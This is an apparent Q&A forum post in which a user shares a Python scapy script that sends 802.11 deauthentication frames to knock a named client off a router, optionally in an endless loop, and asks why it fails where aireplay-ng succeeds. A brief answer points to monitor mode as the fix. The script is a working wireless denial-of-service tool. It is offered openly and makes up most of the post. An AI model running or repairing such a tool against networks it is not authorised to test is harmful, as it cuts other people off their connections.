# Python: Deauth-Script successfully sends packages, but nothing happens

Tags: python, networking, package, wifi, scapy

I've been writing on a deauth script in python, but it doesn't work.
Using aireplay-ng instead works just fine. I'm capturing the packets with wireshark and I can see, that they really went out.

The script:

```
import argparse
import logging
logging.getLogger('scapy.runtime').setLevel(logging.ERROR)
from scapy.all import *

def arg_parse():
    parser = argparse.ArgumentParser()
    parser.add_argument('-i',
                        '--interface',
                        help = 'Select an interface')
    parser.add_argument('-b',
                        '--bssid',
                        help = 'Select the routers BSSID')
    parser.add_argument('-c',
                        '--client',
                        help = 'Select the clients BSSID')
    parser.add_argument('-a',
                        '--amount',
                        type = int,
                        help = 'Select amount of packets to send')
    return parser.parse_args()

def send_deauth():

    # sending deauth packets
    pkt = Dot11(type=0, subtype=12, addr1=client, addr2=bssid, addr3=bssid) / Dot11Deauth(reason=7)
    sendp(pkt)
    print('Deauth-Pckt send to BSSID: ' + bssid)


if __name__ == '__main__':
    args = arg_parse()
    conf.verb = 0

    if args.interface and args.bssid and args.client:
        conf.iface = args.interface
        bssid = args.bssid
        client = args.client 

        if not args.amount:
            while True:
                send_deauth()

        elif args.amount > 0:
            amount = args.amount
            while amount > 0:
                send_deauth()
                amount -= 1
        else:
            print('[-] Invalid amount.')
    else:
        print('[-] Interface and BSSID required.')
```

I noticed the wireshark output saying `destination = broadcast` while sending deauth-pkt with aireplay-ng. After sending them with the script it shows the actual MAC of the target's device. Maybe it has sth to do with the issue.

Answer (score 0):

To send a request like deauth packet using the  broadcast address you have to switch your WiFi adapter to monitoring mode first.